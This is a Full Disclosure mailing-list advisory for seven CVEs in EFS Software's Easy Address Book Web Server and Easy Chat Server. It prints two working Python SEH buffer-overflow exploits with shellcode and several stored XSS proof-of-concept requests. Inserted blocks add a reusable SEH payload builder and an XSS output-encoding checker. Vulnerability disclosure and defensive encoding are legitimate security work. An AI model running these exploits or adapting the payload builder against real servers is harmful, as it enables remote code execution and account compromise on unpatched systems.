Message-ID: <CANoQWWeJiEbMXyStQU4+f3GoJMTNr8tgKNXGonZUcjgEbHY7ng@mail.gmail.com>
Date: Wed, 30 Aug 2023 12:42:43 +0200
From: Rafael Pedrero <rafael.pedrero@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] [CVE-2023-4491, CVE-2023-4492, CVE-2023-4493, CVE-2023-4494, CVE-2023-4495, CVE-2023-4496, CVE-2023-4497] Multiple vulnerabilities in EFS Software products

# Exploit Title: Easy Address Book Web Server v1.6 - Multiple Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2021-01-10
# CVE: CVE-2023-4491, CVE-2023-4492, CVE-2023-4493
# Vendor Homepage: http://www.efssoft.com/web-address-book-server.html
# Software Link : http://www.efssoft.com/eabws.exe (md5sum: 69f77623bb32589fb5343f598b61bbd9)
# Tested Version: 1.6
# Tested on:  Windows 7, 10

# CVE-2023-4491: Vulnerability Type: searchbook Remote Buffer Overflow

CVSS v3: 9.8
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-119


Vulnerability description: There is a remote stack-based buffer overflow
(SEH) in /searchbook.ghp in EFS Software Easy Address Book Web Server 1.6.
By sending an overly long value in the name parameter of a POST request to
/searchbook.ghp, an unauthenticated attacker overwrites the SEH record and
may be able to execute arbitrary code. The PoC below returns through a
pop/pop/ret gadget in the bundled SSLEAY32.DLL (located with mona), so the
handler address does not depend on the OS image; the WinExec address in
the shellcode was read from the test machine's kernel32.dll and has to be
looked up again on any other Windows build.

Proof of concept:

import socket
import struct

def sendbuff():
    # > arwin.exe kernel32.dll WinExec
    # WinExec is located at 0x776f2c91 in kernel32.dll on the test machine;
    # the address is build-specific and must be looked up again on the target
    shellcode_WinExec = (
        b"\x33\xc0"                          # XOR EAX,EAX
        b"\x50"                              # PUSH EAX      => NULL terminator for lpCmdLine
        b"\x68\x2E\x65\x78\x65"              # PUSH ".exe"
        b"\x68\x63\x61\x6C\x63"              # PUSH "calc"
        b"\x8B\xC4"                          # MOV EAX,ESP   => EAX = &"calc.exe"
        b"\x6A\x01"                          # PUSH 1        => uCmdShow
        b"\x50"                              # PUSH EAX      => lpCmdLine
        b"\xBB\x91\x2c\x6f\x77"              # MOV EBX,kernel32.WinExec
        b"\xFF\xD3")                         # CALL EBX

    shellcode_system = (
        b"\x31\xC9"                # xor ecx,ecx
        b"\x51"                    # push ecx      => NULL terminator
        b"\x68\x63\x61\x6C\x63"    # push "calc"
        b"\x54"                    # push esp      => pointer to "calc"
        b"\xB8\x6f\xb1\xdc\x75"    # mov eax,msvcrt.system (build-specific address)
        b"\xFF\xD0")               # call eax

    shellcode = shellcode_WinExec
    # SEH overwrite: 455 bytes of filler reach the nSEH/SEH pair
    buffer  = b"A" * 455
    buffer += b"\xeb\x10\x90\x90"              # nSEH: jmp short +0x10 lands inside the NOP sled
    buffer += struct.pack('<L', 0x1001071e)    # SEH: pop/pop/ret @ 0x1001071e in SSLEAY32.DLL (from !mona)
    buffer += b"\x90" * 20                     # NOP sled
    buffer += shellcode
    buffer += b"D" * (840 - 455 - len(shellcode) - 4 - 4 - 20)   # pad to 840 bytes total
    return buffer


def REQ_POST(padding):
    # the overflow is in the name parameter; the rest of the form is what the
    # browser sends from searchcontact.ghp
    body = (b"addrbookid=1&contactid=%3C%21--cid--%3E&cancelflag=0&name=" + padding +
            b"&cancelflag=0&name=AAA&Email=&address=&phone=&other=&search=Start+Search\r\n\r\n")
    headers = (
        "POST http://" + ip + "/searchbook.ghp?id=1 HTTP/1.1\r\n"
        "User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0\r\n"
        "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
        "Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "Content-Length: " + str(len(body)) + "\r\n"     # computed from the real body
        "Connection: keep-alive\r\n"
        "Referer: http://" + ip + "/searchcontact.ghp?id=1\r\n"
        "Cookie: SESSIONID=3938; UserID=; PassWD=\r\n"
        "Upgrade-Insecure-Requests: 1\r\n"
        "Host: " + ip + "\r\n\r\n"
    )
    return headers.encode("ascii") + body

ip = '192.168.X.X'   # change to the target address
port = 80
payload = sendbuff()

try:
    print("\n[*] Sending POST (searchbook.ghp) exploit to Easy Address Book Web Server V1.6, length " + str(len(payload)))
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    s.sendall(REQ_POST(payload))
    s.recv(1024)
    s.close()
    print("\n[*] Sent POST, length " + str(len(payload)))
except socket.error as e:
    print("Connection error: " + str(e))



# CVE-2023-4492: Vulnerability Type: stored Cross-Site Scripting (XSS) - #1

CVSS v3: 6.1
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description: Easy Address Book Web Server v1.6 does not
sufficiently encode user-controlled input, resulting in a stored
Cross-Site Scripting (XSS) vulnerability via /addrbook.ghp (POST method)
in multiple parameters. The stored values are rendered unencoded in the
contact list, including inside the JavaScript href of the Delete link
(see the response below).

Proof of concept:

POST http://localhost/addrbook.ghp?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 475
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/editcontact.ghp?id=1&cid=12
Cookie: SESSIONID=15337; UserID=; PassWD=
Upgrade-Insecure-Requests: 1
Host: localhost

addrbookid=1&contactid=14&cancelflag=0&firstname=%3C%2Fa%3E%3Cscript%3Ealert%2811%29%3B%3C%2Fscript%3E%3Ca%3E&middlename=demo1&lastname=demo1&nickname=demo1&Email=demo1%40demo1.com&company=demo1&jobtitle=demo1&department=demo1&office=demo1&workphone=&workfax=&workaddress=demo1&workcity=&workstate=&workzip=&workcountry=USA&homephone=&homefax=&homeaddress=demo1&homecity=&homestate=&homezip=&homecountry=USA&mobilephone=&pager=&email2=&email3=&homepage=&notes=demo1&save=Save

Vulnerable parameters: firstname, homephone, lastname, middlename,
workaddress, workcity, workcountry, workphone, workstate, workzip

Response:

 <TR>
              <TD class=row2><SPAN class=genmed><A target=_blank class=genmed href="viewcontact.ghp?id=1&cid=12">demo1 </a><script>alert(1);</script><a> demo1</A></SPAN></TD>
              <TD class=row2 align=left><SPAN class=genmed><a href="mailto:demo1@...o1.com">demo1@...o1.com</a></SPAN></TD>
              <TD class=row2 align=left><SPAN class=genmed></SPAN></TD>
              <TD class=row2 align=left><SPAN class=genmed></SPAN></TD>
              <TD class=row2 align=left><SPAN class=genmed>demo1, , , , USA</SPAN></TD>
              <TD class=row2 align=left><SPAN class=genmed><a href="editcontact.ghp?id=1&cid=12">Edit</a></SPAN></TD>
              <TD class=row2 align=left><SPAN class=genmed><a href="javascript:deletecontact('deletecontact.ghp?id=1&cid=12','demo1 </a><script>alert(1);</script><a> demo1')">Delete</a></SPAN></TD>



# CVE-2023-4493: Vulnerability Type: stored Cross-Site Scripting (XSS) - #2


CVSS v3: 6.1
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description: Easy Address Book Web Server v1.6 does not
sufficiently encode user-controlled input, resulting in a stored
Cross-Site Scripting (XSS) vulnerability via /users_admin.ghp (POST
method, authenticated Admin user) in multiple parameters. The value is
written into a double-quoted value attribute, so a leading "> closes the
attribute and the input tag. Note that injection requires Admin
credentials, which the PR:N in the vector above does not reflect.

Proof of concept:

Example 1:

POST http://localhost/users_admin.ghp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 134
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/users_admin.ghp
Cookie: SESSIONID=19655; UserID=Admin; PassWD=<redacted>
Upgrade-Insecure-Requests: 1
Host: localhost

userid=2&username=test&password=test&email=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&level=user&state=Enable&update_user=Update

Vulnerable parameter: email

Response:

<form method="POST" action="">
<TR>
<input type="hidden" name="userid" value="2">
<TD class=row2 align=left><input type="text" name="username" size="15" value="test"> </TD>
<TD class=row2 align=left><input type="text" name="password" size="15" value=""> </TD>
<TD class=row2 align=left><input type="text" name="email" size="35" value=""><script>alert(1);</script>"> </TD>
<TD class=row2 align=left><select name="level"><option >guest</option><option selected>user</option><option >power user</option></select></TD>
<TD class=row2 align=left><select name="state"><option selected>Enable</option><option >Disable</option></select></TD>
<TD class=row2 align=left><input type="submit" value="Update" name="update_user"></TD>
<TD class=row2><SPAN class=genmed><A class=genmed href="user_delete_admin.ghp?2">Delete</A></SPAN></TD>
</TR>
</form>

Example 2:

POST http://localhost/users_admin.ghp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/users_admin.ghp
Cookie: SESSIONID=19655; UserID=Admin; PassWD=<redacted>
Upgrade-Insecure-Requests: 1
Host: localhost

userid=2&username=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&password=test&email=tt%40fsdfs.com&level=user&state=Enable&update_user=Update

Vulnerable parameter: username

Response:

<form method="POST" action="">
<TR>
<input type="hidden" name="userid" value="2">
<TD class=row2 align=left><input type="text" name="username" size="15" value=""><script>alert(1);</script>"> </TD>
<TD class=row2 align=left><input type="text" name="password" size="15" value=""> </TD>
<TD class=row2 align=left><input type="text" name="email" size="35" value="tt@...fs.com"> </TD>
<TD class=row2 align=left><select name="level"><option >guest</option><option selected>user</option><option >power user</option></select></TD>
<TD class=row2 align=left><select name="state"><option selected>Enable</option><option >Disable</option></select></TD>
<TD class=row2 align=left><input type="submit" value="Update" name="update_user"></TD>
<TD class=row2><SPAN class=genmed><A class=genmed href="user_delete_admin.ghp?2">Delete</A></SPAN></TD>
</TR>
</form>

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

# Exploit Title: Easy Chat Server v3.1 - Multiple Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2021-01-09
# CVE: CVE-2023-4494, CVE-2023-4495, CVE-2023-4496, CVE-2023-4497
# Vendor Homepage: http://www.echatserver.com/
# Software Link : http://echatserver.com/ecssetup.exe (md5sum: c682138ebbea9af7948a3f142bbd054b)
# Tested Version: 3.1
# Tested on:  Windows 7, 10

# CVE-2023-4494: Vulnerability Type: register Remote Buffer Overflow

CVSS v3: 9.8
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-119


Vulnerability description: There is a remote stack-based buffer overflow
(SEH) in register.ghp in EFS Software Easy Chat Server versions 2.0 to 3.1.
By sending an overly long username parameter in a GET request to
register.ghp, an unauthenticated attacker overwrites the SEH record and
may be able to execute arbitrary code. Because the payload travels in the
query string, the shellcode in the PoC below was encoded to avoid 0x00 and
0x20 (space); the pop/pop/ret gadget again comes from the bundled
SSLEAY32.DLL.

Proof of concept:

import socket

def sendbuff():
    # calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/
    # msfencode -b "\x00\x20" -i w32-exec-calc-shellcode.bin
    # [*] x86/shikata_ga_nai succeeded with size 101 (iteration=1)
    # (0x00 and 0x20 are excluded because the payload travels in the query string)
    shellcode = (
        b"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9"
        b"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56"
        b"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9"
        b"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97"
        b"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64"
        b"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8"
        b"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a"
        b"\x1c\x39\xbd"
    )

    # SEH overwrite: 473 bytes of filler reach the nSEH/SEH pair
    buffer  = b"A" * 473
    buffer += b"\xeb\x06\x90\x90"          # nSEH: jmp short +6 lands on the shellcode
    buffer += b"\x1e\x0e\x01\x10"          # SEH: pop/pop/ret @ 0x10010E1E in SSLEAY32.DLL (from !mona), little-endian
    buffer += shellcode
    buffer += b"D" * (600 - 473 - len(shellcode) - 4 - 4)   # pad to 600 bytes total
    return buffer


def REQ_GET(padding):
    # the overflow is in the username query parameter, so it goes raw into the request line
    request_line = b"GET /register.ghp?username=" + padding + b"&password= HTTP/1.1\r\n"
    headers = (
        "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36\r\n"
        "Host: " + ip + ":80\r\n"
        "Accept-Language: es-es\r\n"
        "Accept-Encoding: gzip, deflate\r\n"
        "Referer: http://" + ip + "\r\n"
        "Connection: Keep-Alive\r\n\r\n"
    )
    return request_line + headers.encode("ascii")

ip = '192.168.X.X'   # change to the target address
port = 80
payload = sendbuff()

try:
    print("\n[*] Sending GET (register.ghp) exploit to EFS Easy Chat Server 3.1, length " + str(len(payload)))
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    s.sendall(REQ_GET(payload))
    s.recv(1024)
    s.close()
    print("\n[*] Sent GET, length " + str(len(payload)))
except socket.error as e:
    print("Connection error: " + str(e))
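The two SEH overwrites above (CVE-2023-4491 and CVE-2023-4494) use the same buffer layout, built by hand in each sendbuff(). The block below is an added example, not code from the advisory or from EFS Software: a small Python 3 builder that produces that layout from its parameters and checks it before anything is sent, namely that sled and shellcode fit in the buffer, that the nSEH short jump lands inside the NOP sled or exactly on the shellcode, and that no bad character appears in the bytes that have to survive the copy. The offsets, gadget addresses and the WinExec stub are the advisory's; the function names, the reuse of the WinExec stub for the register.ghp layout (the advisory used an encoded calc shellcode there) and the extra query-string bad characters (CR, LF, '&', '=') are my assumptions.

```python
import struct

# Constructed for this example: the 25-byte WinExec("calc.exe") stub from the
# searchbook.ghp PoC above. Its hard-coded WinExec address is only valid on the
# advisory's test machine.
CALC_WINEXEC = (b"\x33\xc0\x50\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63"
                b"\x8b\xc4\x6a\x01\x50\xbb\x91\x2c\x6f\x77\xff\xd3")

# Bytes that cannot survive the copy: NUL everywhere; in a query string also
# space (what msfencode was told to avoid), CR/LF (end the request line) and
# the form delimiters. The last two groups are an assumption beyond the
# advisory's "\x00\x20".
DEFAULT_BAD_CHARS = b"\x00"
QUERY_BAD_CHARS = b"\x00\x20\x0d\x0a&="


def short_jmp(disp):
    """x86 'jmp short rel8' (EB xx) padded with two NOPs to fill the 4-byte
    nSEH slot. disp is relative to the end of the 2-byte instruction."""
    if not -128 <= disp <= 127:
        raise ValueError("rel8 displacement out of range: %d" % disp)
    return bytes([0xEB, disp & 0xFF]) + b"\x90\x90"


def layout(seh_offset, jmp_disp, sled_len, shellcode_len):
    """Offsets (from the start of the buffer) of each region and of the byte
    the short jump lands on."""
    nseh = seh_offset
    seh = nseh + 4
    sled = seh + 4
    shellcode = sled + sled_len
    return {"nseh": nseh, "seh": seh, "sled": sled, "shellcode": shellcode,
            "end": shellcode + shellcode_len,
            "landing": nseh + 2 + jmp_disp}    # the jmp sits at nseh and is 2 bytes long


def validate_layout(seh_offset, jmp_disp, ppr_address, shellcode, total_length,
                    sled_len=0, bad_chars=DEFAULT_BAD_CHARS):
    """Return a list of problems; an empty list means the layout is sound."""
    problems = []
    lay = layout(seh_offset, jmp_disp, sled_len, len(shellcode))
    if lay["end"] > total_length:
        problems.append("sled + shellcode overrun the %d-byte buffer by %d bytes"
                        % (total_length, lay["end"] - total_length))
    if not lay["sled"] <= lay["landing"] <= lay["shellcode"]:
        problems.append("jmp short lands at offset %d, outside [%d, %d]"
                        % (lay["landing"], lay["sled"], lay["shellcode"]))
    controlled = short_jmp(jmp_disp) + struct.pack("<L", ppr_address) + shellcode
    found = sorted({b for b in bad_chars if b in controlled})
    if found:
        problems.append("bad chars in nSEH/SEH/shellcode: "
                        + " ".join("\\x%02x" % b for b in found))
    return problems


def build_seh_payload(seh_offset, jmp_disp, ppr_address, shellcode, total_length,
                      sled_len=0, bad_chars=DEFAULT_BAD_CHARS):
    """junk | nSEH | SEH (pop/pop/ret) | NOP sled | shellcode | filler,
    exactly total_length bytes, or ValueError if validate_layout objects."""
    problems = validate_layout(seh_offset, jmp_disp, ppr_address, shellcode,
                               total_length, sled_len, bad_chars)
    if problems:
        raise ValueError("; ".join(problems))
    body = (short_jmp(jmp_disp) + struct.pack("<L", ppr_address)
            + b"\x90" * sled_len + shellcode)
    return b"A" * seh_offset + body + b"D" * (total_length - seh_offset - len(body))


if __name__ == "__main__":
    cases = {
        # searchbook.ghp: nSEH at 455, jmp +0x10 into a 20-byte sled, 840 bytes
        "searchbook.ghp": dict(seh_offset=455, jmp_disp=0x10, ppr_address=0x1001071e,
                               total_length=840, sled_len=20),
        # register.ghp: nSEH at 473, jmp +6 straight onto the shellcode, 600 bytes
        "register.ghp": dict(seh_offset=473, jmp_disp=6, ppr_address=0x10010E1E,
                             total_length=600, bad_chars=QUERY_BAD_CHARS),
    }
    for name, args in cases.items():
        payload = build_seh_payload(shellcode=CALC_WINEXEC, **args)
        print("%-15s %d bytes  %s" % (name, len(payload),
              layout(args["seh_offset"], args["jmp_disp"],
                     args.get("sled_len", 0), len(CALC_WINEXEC))))
```

Running it prints the region offsets of both layouts. Passing a displacement of 2 instead of 6 for the register.ghp case is reported as a jump that lands on the handler address rather than on the shellcode, and a gadget address with a zero byte is reported before it can truncate the request.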



# CVE-2023-4495: Vulnerability Type: stored Cross-Site Scripting (XSS) - #1

CVSS v3: 6.1
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description: Easy Chat Server v3.1 does not sufficiently
encode user-controlled input, resulting in a stored Cross-Site Scripting
(XSS) vulnerability via /registresult.htm (POST method) in the Resume
parameter. The stored value is rendered by /register.ghp inside a
TEXTAREA, so the payload first closes that element with </TEXTAREA>.

Proof of concept:

POST http://localhost/registresult.htm HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 257
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/register.ghp?username=<redacted>&password=<redacted>
Upgrade-Insecure-Requests: 1
Host: localhost

UserName=<redacted>&Password=<redacted>&Password1=demo1&Sex=0&Email=demo1%25252540demo1.com&Icon=0.gif&Resume=%3C%2FTEXTAREA%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3CTEXTAREA%3E&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Change

Response:
<BODY bgcolor="#b8d0dc"><center>Congratulations! Your information has been
changed successfully.</center></body>


Go to:
http://localhost/register.ghp?username=<redacted>&password=<redacted>

Response - xss:
<TR><TD>
Your profile/interests:<BR>
<TEXTAREA rows="4" cols="30" name="Resume"></TEXTAREA><script>alert(1)</script><TEXTAREA></TEXTAREA>
<INPUT type="hidden" name="cw" value="0">
<INPUT type="hidden" name="RoomID" value="<!--$RoomID-->">
<INPUT type="hidden" name="RepUserName" value="<!--$UserName-->">
</TD></TR>

# CVE-2023-4496: Vulnerability Type: stored Cross-Site Scripting (XSS) - #2


CVSS v3: 6.1
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description: Easy Chat Server v3.1 does not sufficiently
encode user-controlled input, resulting in a stored Cross-Site Scripting
(XSS) vulnerability via /body2.ghp (POST method) in the mtowho parameter.
The value is written into a JavaScript string inside an inline script, so
the payload closes the script block with </script> rather than breaking
out of the string literal.


Proof of concept:

POST http://localhost/body2.ghp?username=<redacted>&password=<redacted>&room=4 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 248
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/chatsubmit.ghp?username=<redacted>&password=<redacted>&room=4
Upgrade-Insecure-Requests: 1
Host: localhost

staticname=%3A000539&tnewname=&msayinfo=demo+&mnewname=&mtowho=%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cscript%3E&mfilters=0&mfont=0&mfcolor=1&elist=100&seltype=Theme&msg=&Submit=Send&sc=on&notifysound=on&message=demo+&chat_flag=


Response:
<html>
<head>
</head>
<body>
<script language="JavaScript">
<!--
parent.board.document.body.innerHTML=parent.board.document.body.innerHTML+"<br><font color=green size=2>08:22:16 <a target=chatsubmit href=javascript:parent.chatsubmit.getname('<redacted>');><redacted></a> => <a target=chatsubmit href=javascript:parent.chatsubmit.getname('</script><script>alert(1);</script><script>');></script><script>alert(1);</script><script></a> </font><font color=#000000 size=2>demo </font> <img src=/face/100.gif border=0>";
// -->
</script>
</body>
</html>


# CVE-2023-4497: Vulnerability Type: stored Cross-Site Scripting (XSS) - #3

CVSS v3: 6.1
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description: Easy Chat Server v3.1 does not sufficiently
encode user-controlled input, resulting in a stored Cross-Site Scripting
(XSS) vulnerability via /registresult.htm (POST method) in the Icon
parameter. The stored value is rendered by /users.ghp inside the src
attribute of an img tag.

Proof of concept:

POST /registresult.htm HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 235
Origin: http://localhost
Connection: close
Referer: http://localhost/register.ghp?username=<redacted>&password=<redacted>
Upgrade-Insecure-Requests: 1

UserName=<redacted>&Password=<redacted>&Password1=<redacted>&Sex=0&Email=<redacted>%252525252540<redacted>.com&Icon="><script>alert(111)</script><img%20src="1.gif&Resume=AAA&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Change

Response:
<BODY bgcolor="#b8d0dc"><center>Congratulations! Your information has been
changed successfully.</center></body>

When the user information page loads:

http://localhost/users.ghp?username=<redacted>&password=<redacted>&room=4

&nbsp;<font color="red">[vip room]</font>
<br><br>
[Online users:1]<br><br>[<a href="javascript:parent.chatsubmit.getname('All');" target="chatsubmit">All</a>]
<br><br>
<script>
if(navigator.appName!="Netscape" && parent.chatsubmit.document &&
parent.chatsubmit.document.readyState == "complete")
parent.chatsubmit.listcolorchange();
</script>
<img src="/images/&quot;"><script>alert(111)</script><i>[<a href="javascript:parent.chatsubmit.getname('<redacted>');" target="chatsubmit"><redacted></a>]&lt;==<br>
<br>
<br><br>
[<a href="javascript:OnRegister();">Change infomation</a>]
</i>
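Every stored XSS in this advisory is the same defect seen from a different HTML context: text between tags (firstname on addrbook.ghp), a double-quoted attribute (email and username on users_admin.ghp, Icon on users.ghp), TEXTAREA content (Resume on register.ghp) and a JavaScript string inside an inline script (mtowho on body2.ghp). The right encoding differs per context. The block below is an added example, not EFS Software's code and not part of the advisory: one encoder per context plus a check that the encoded value can no longer leave its container. The payloads are the ones from the PoCs above; the templates are simplified stand-ins for the server's HTML, and the onfocus attribute payload is constructed here to show why escaping only < and > is not enough inside an attribute.

```python
import html
import json
import re

# Constructed sample input: the payloads from the PoCs above, keyed by the
# kind of HTML context each one landed in.
PAYLOADS = {
    "text":     "</a><script>alert(1);</script><a>",                # firstname, addrbook.ghp
    "attr":     '"><script>alert(1);</script>',                     # email / username, users_admin.ghp
    "textarea": "</TEXTAREA><script>alert(1)</script><TEXTAREA>",   # Resume, registresult.htm
    "js":       "</script><script>alert(1);</script><script>",      # mtowho, body2.ghp
}
# Constructed, not from the advisory: attribute breakout that needs no '<'.
ATTR_HANDLER = '" onfocus="alert(1)" autofocus="'

# Simplified stand-ins for the server's templates; {} marks where the value goes.
TEMPLATES = {
    "text":     '<A class=genmed href="viewcontact.ghp?id=1&cid=12">{}</A>',
    "attr":     '<input type="text" name="email" size="35" value="{}">',
    "textarea": '<TEXTAREA rows="4" cols="30" name="Resume">{}</TEXTAREA>',
    "js":       "<script>parent.chatsubmit.getname({});</script>",
}


def encode(context, value):
    """Encode value for one context; each context has its own breakout characters."""
    if context in ("text", "textarea"):
        return html.escape(value, quote=False)       # & < >
    if context == "attr":
        return html.escape(value, quote=True)        # & < > " '
    if context == "js":
        # A JSON string literal is a valid JS string literal; '</' is split so
        # the HTML tokenizer can never see '</script>' inside the literal.
        return json.dumps(value).replace("</", "<\\/")
    raise ValueError("unknown context: %r" % context)


def weak_attr_encode(value):
    """The mistake to avoid inside an attribute: escaping only & < > leaves the
    quote free to close the attribute and append an event handler."""
    return html.escape(value, quote=False)


def decode_js(encoded):
    """Parse the literal back (JSON is a subset of JS string syntax)."""
    return json.loads(encoded)


def render(context, encoded):
    return TEMPLATES[context].format(encoded)


def breaks_out(context, encoded):
    """True if the (already encoded) value can still leave its container."""
    if context == "text":
        return "<" in encoded                                       # can open a tag
    if context == "attr":
        return '"' in encoded                                       # can close the attribute
    if context == "textarea":
        return re.search(r"</textarea", encoded, re.I) is not None  # only exit from RCDATA
    if context == "js":
        if re.search(r"</script", encoded, re.I):                   # ends the script block
            return True
        try:
            return not isinstance(json.loads(encoded), str)         # must be one string literal
        except ValueError:
            return True
    raise ValueError("unknown context: %r" % context)


def check_all():
    """context -> (raw payload breaks out?, encoded payload breaks out?)"""
    return {ctx: (breaks_out(ctx, raw), breaks_out(ctx, encode(ctx, raw)))
            for ctx, raw in PAYLOADS.items()}


if __name__ == "__main__":
    for ctx, (raw_bad, enc_bad) in check_all().items():
        print("%-8s raw breaks out: %-5s  encoded breaks out: %s" % (ctx, raw_bad, enc_bad))
        print("         " + render(ctx, encode(ctx, PAYLOADS[ctx])))
    print("attr, weak encoding, handler payload breaks out:",
          breaks_out("attr", weak_attr_encode(ATTR_HANDLER)))
```

The js case is the one most often got wrong: backslash-escaping the quotes protects the string literal but not the script element, because the HTML tokenizer ends the element at the first </script regardless of JavaScript syntax, which is exactly what the mtowho payload exploits.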
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
